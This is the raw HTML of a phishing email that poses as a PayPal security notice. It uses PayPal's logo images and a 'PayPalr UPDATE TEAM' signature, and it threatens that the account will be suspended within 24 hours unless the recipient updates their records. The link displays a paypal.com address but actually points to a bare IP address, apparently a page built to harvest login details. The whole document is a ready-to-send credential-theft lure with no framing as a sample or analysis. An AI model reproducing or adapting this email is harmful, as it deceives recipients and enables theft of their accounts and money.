<html><div>

<div align=center>

<table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width=600
 style='width:450.0pt;mso-cellspacing:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'>
 <tr style='mso-yfti-irow:0;mso-yfti-lastrow:yes'>
  <td valign=top style='padding:0cm 0cm 0cm 0cm'>
  <p class=MsoNormal><a href="https://www.paypal.com/" target="_blank"><span
  style='text-decoration:none;text-underline:none'><img alt="PayPal" src="http://www.paypal.com/images/paypal_logo.gif"  border="0">
  </td>
 </tr>
</table>

</div>

<p class=MsoNormal><span style='display:none;mso-hide:all'><o:p>&nbsp;</o:p></span></p>

<div align=center>

<table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width="100%"
 style='width:100.0%;mso-cellspacing:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'>
 <tr style='mso-yfti-irow:0'>
  <td width="100%" style='width:100.0%;padding:0cm 0cm 0cm 0cm'
  background="http://images.paypal.com/en_US/i/scr/bg_clk.gif">
  <p class=MsoNormal><img border=0 width=1 height=29 id="_x0000_i1026"
  src="http://images.paypal.com/en_US/i/scr/pixel.gif"></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:1;mso-yfti-lastrow:yes'>
  <td style='padding:0cm 0cm 0cm 0cm'>
  <p class=MsoNormal><img border=0 width=1 height=10 id="_x0000_i1027"
  src="http://images.paypal.com/en_US/i/scr/pixel.gif"></p>
  </td>
 </tr>
</table>

</div>

<p class=MsoNormal><span style='display:none;mso-hide:all'><o:p>&nbsp;</o:p></span></p>

<div align=center>

<table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width=600
 style='width:450.0pt;mso-cellspacing:0cm;mso-padding-alt:0cm 0cm 0cm 0cm'>
 <tr style='mso-yfti-irow:0;mso-yfti-lastrow:yes'>
  <td style='padding:0cm 0cm 0cm 0cm'>
  <p class=MsoNormal><o:p>&nbsp;</o:p></p>
  </td>
 </tr>
</table>

</div>
<P><FONT face=Verdana size=2><STRONG>Dear valued PayPalr member:</STRONG> </FONT></P>
<P align=left><FONT face=Verdana size=2>&nbsp;Due to concerns, for the safety and integrity of the paypal<BR>account we have issued this warning message.</FONT></P>
<P><FONT face=Verdana size=2>&nbsp;It has come to our attention that your PayPalr account information needs to be <BR>updated as part of our continuing commitment to protect your account and to <BR>reduce the instance of fraud on our website. If you could please take 5-10 minutes <BR>out of your online experience and update your personal records you will not run into <BR>any future problems with the online service. <BR>&nbsp;</FONT></P>
<P><FONT face=Verdana size=2>However, failure to update your records will result in account suspension. <BR>Please update your records on or before within 24 hours
<P><FONT face=Verdana size=2>Once you have updated your account records your paypal account<BR>service will not be interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>To update your PayPalr records click on the following link: <BR></FONT><A href="http://62.24.92.220/www.paypal.com/webscr_cmd=_login-run1847/" target=_blank><FONT face=Verdana color=#003399 size=2>http://www.paypal.com/cgi-bin/webscr?cmd=_login-run</FONT></A></P>
<P><FONT face=Verdana size=2>Thank You.<BR><STRONG><FONT size=1>PayPalr UPDATE TEAM</FONT> </STRONG></FONT></P>
<tbody></tbody><tbody></tbody><tbody></tbody><tbody></tbody><tbody></tbody><tbody></tbody></html>